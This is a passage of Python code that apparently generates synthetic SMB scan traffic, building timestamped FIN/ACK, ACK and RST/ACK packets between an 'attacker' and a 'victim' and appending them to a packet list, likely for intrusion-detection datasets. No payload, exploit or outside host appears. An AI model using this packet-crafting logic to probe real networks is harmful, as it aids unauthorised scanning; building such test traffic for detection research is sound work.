                    timestamp_src_fin_ack = Util.update_timestamp(
                        timestamp_confirm, pps, min_delay)
                    source_fin_ack.time = timestamp_src_fin_ack
                    attacker_seq += 1
                    self.packets.append(source_fin_ack)

                    # victim sends FIN ACK
                    reply_tcp = inet.TCP(sport=SMBLib.smb_port,
                                         dport=sport,
                                         seq=victim_seq,
                                         ack=attacker_seq,
                                         window=destination_win_value,
                                         flags='FA')
                    destination_fin_ack = (reply_ether / reply_ip / reply_tcp)
                    timestamp_dest_fin_ack = Util.update_timestamp(
                        timestamp_src_fin_ack, pps, min_delay)
                    victim_seq += 1
                    destination_fin_ack.time = timestamp_dest_fin_ack
                    self.packets.append(destination_fin_ack)

                    # source sends final ACK
                    confirm_tcp = inet.TCP(sport=sport,
                                           dport=SMBLib.smb_port,
                                           seq=attacker_seq,
                                           ack=victim_seq,
                                           window=source_win_value,
                                           flags='A')
                    final_ack = (confirm_ether / confirm_ip / confirm_tcp)
                    timestamp_final_ack = Util.update_timestamp(
                        timestamp_dest_fin_ack, pps, min_delay)
                    final_ack.time = timestamp_final_ack
                    self.packets.append(final_ack)

                else:
                    # Build RST package
                    reply_ether = inet.Ether(src=mac_destination,
                                             dst=mac_source)
                    reply_ip = inet.IP(src=ip,
                                       dst=ip_source,
                                       ttl=destination_ttl_value,
                                       flags='DF')
                    reply_tcp = inet.TCP(sport=SMBLib.smb_port,
                                         dport=sport,
                                         seq=0,
                                         ack=attacker_seq,
                                         flags='RA',
                                         window=destination_win_value,
                                         options=[('MSS',
                                                   destination_mss_value)])
                    reply = (reply_ether / reply_ip / reply_tcp)
                    reply.time = timestamp_reply
                    self.packets.append(reply)

            pps = max(
                Util.get_interval_pps(complement_interval_pps,
                                      timestamp_next_pkt), 10)
            timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps)